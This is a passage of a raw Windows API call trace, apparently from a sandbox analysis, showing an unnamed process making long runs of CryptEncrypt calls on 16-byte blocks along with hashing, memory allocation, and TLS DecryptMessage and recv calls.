pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] malloc (_Size=0x1fd) returned 0x3691270 [0191.009] free (_Block=0x0) [0191.009] free (_Block=0x3d81e60) [0191.009] free (_Block=0x606108) [0191.009] malloc (_Size=0x1fd) returned 0x606108 [0191.009] free (_Block=0x0) [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.009] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.010] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.011] CryptEncrypt (in: hKey=0x3e1998, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x6060e4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.012] malloc (_Size=0x1fd) returned 0x3d81e60 [0191.012] free (_Block=0x0) [0191.012] free (_Block=0x3691270) [0191.013] free (_Block=0x606108) [0191.013] malloc (_Size=0x1fd) returned 0x606108 [0191.013] free (_Block=0x0) [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.013] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.014] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] CryptEncrypt (in: hKey=0x4329b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3f68bf4*, pdwDataLen=0x339faa4*=0x10) returned 1 [0191.015] malloc (_Size=0x1fd) returned 0x3691270 [0191.015] free (_Block=0x0) [0191.015] free (_Block=0x3d81e60) [0191.015] malloc (_Size=0x1fd) returned 0x3d81e60 [0191.015] free (_Block=0x0) [0191.015] CryptDuplicateHash (in: hHash=0x432c78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fb34 | out: phHash=0x339fb34) returned 1 [0191.016] CryptHashData (hHash=0x432af8, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0191.016] malloc (_Size=0x14) returned 0x3f652c0 [0191.016] free (_Block=0x0) [0191.016] CryptGetHashParam (in: hHash=0x432af8, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339faec, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339faec) returned 1 [0191.016] CryptHashData (hHash=0x432c78, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0191.016] free (_Block=0x3f652c0) [0191.016] CryptDestroyHash (hHash=0x432af8) returned 1 [0191.016] free (_Block=0x3d81e60) [0191.016] free (_Block=0x606108) [0191.016] malloc (_Size=0x1fd) returned 0x606108 [0191.016] free (_Block=0x0) [0191.016] free (_Block=0x0) [0191.016] free (_Block=0x0) [0191.016] SetEvent (hEvent=0x380) returned 1 [0191.017] SetEvent (hEvent=0x3a4) returned 1 [0191.017] free (_Block=0x0) [0191.017] free (_Block=0x606108) [0191.017] free (_Block=0x3691270) [0191.017] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x80090318 [0191.017] recv (in: s=0x5c8, buf=0x3689268, len=16413, flags=0 | out: buf=0x3689268*) returned 543 [0196.936] DecryptMessage (in: phContext=0x3594d4c, pMessage=0x339fb0c, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x339fb0c, pfQOP=0x0) returned 0x0 [0196.937] malloc (_Size=0x1fd) returned 0x606108 [0196.937] free (_Block=0x0) [0196.937] malloc (_Size=0x1fd) returned 0x3691270 [0196.937] free (_Block=0x0) [0196.938] free (_Block=0x0) [0196.938] free (_Block=0x606108) [0196.938] malloc (_Size=0x1fd) returned 0x606108 [0196.938] free (_Block=0x0) [0196.938] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.938] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.939] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.940] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.941] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] CryptEncrypt (in: hKey=0x3e0e18, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10, dwBufLen=0x10 | out: pbData=0x3594fbc*, pdwDataLen=0x339faa4*=0x10) returned 1 [0196.942] malloc 